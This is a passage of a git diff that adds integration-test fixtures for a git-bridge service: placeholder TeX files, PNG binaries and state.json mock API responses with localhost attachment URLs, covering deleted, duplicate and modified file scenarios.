"success", + "versionID": 2 + } + }, + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.333Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3881/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/state.json new file mode 100644 index 0000000..d2b26f0 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/base/state.json @@ -0,0 +1,46 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3863/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/withDeletedBinaryFile/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/withDeletedBinaryFile/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/withDeletedBinaryFile/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/withDeletedBinaryFile/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/withDeletedBinaryFile/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/withDeletedBinaryFile/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/withDeletedBinaryFile/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/withDeletedBinaryFile/state.json new file mode 100644 index 0000000..83079f5 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedBinaryFile/withDeletedBinaryFile/state.json @@ -0,0 +1,68 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 2, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 2, + "comment": "i deleted the image", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:48:01.123Z" + }, + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 2, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + ] + }, + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3863/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/state.json new file mode 100644 index 0000000..8089258 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/base/state.json @@ -0,0 +1,46 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3860/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/withDeletedTexFile/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/withDeletedTexFile/000000000000000000000000/main.tex new file mode 100644 index 0000000..933682f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/withDeletedTexFile/000000000000000000000000/main.tex @@ -0,0 +1,2 @@ +content +added more stuff diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/withDeletedTexFile/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/withDeletedTexFile/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/withDeletedTexFile/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/withDeletedTexFile/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/withDeletedTexFile/state.json new file mode 100644 index 0000000..6685ef8 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADeletedTexFile/withDeletedTexFile/state.json @@ -0,0 +1,68 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 2, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 2, + "comment": "i deleted test.tex", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:48:01.123Z" + }, + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 2, + "srcs": [ + { + "content": "content\nadded more stuff\n", + "path": "main.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3860/withDeletedTexFile/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + }, + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3860/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/state.json new file mode 100644 index 0000000..4ac8c79 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/base/state.json @@ -0,0 +1,46 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:4001/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/overleaf-white-410-copy.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/overleaf-white-410-copy.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/overleaf-white-410-copy.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/state.json new file mode 100644 index 0000000..ff0c3ee --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullADuplicateBinaryFile/withDuplicateBinaryFile/state.json @@ -0,0 +1,76 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 2, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 2, + "comment": "i deleted the image", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:48:01.123Z" + }, + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 2, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:4001/withDuplicateBinaryFile/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + }, + { + "url": "http://127.0.0.1:4001/withDuplicateBinaryFile/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410-copy.png" + } + ] + }, + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:4001/withDuplicateBinaryFile/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/state.json new file mode 100644 index 0000000..77fab7a --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/base/state.json @@ -0,0 +1,46 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3862/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/000000000000000000000000/main.tex new file mode 100644 index 0000000..933682f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/000000000000000000000000/main.tex @@ -0,0 +1,2 @@ +content +added more stuff diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..7fa339b Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/state.json new file mode 100644 index 0000000..ff9cdb7 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedBinaryFile/withModifiedBinaryFile/state.json @@ -0,0 +1,72 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 2, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 2, + "comment": "i changed the image", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:48:01.123Z" + }, + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 2, + "srcs": [ + { + "content": "content\nadded more stuff\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3862/withModifiedBinaryFile/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + }, + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3862/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/state.json new file mode 100644 index 0000000..ea21d9a --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/base/state.json @@ -0,0 +1,46 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": 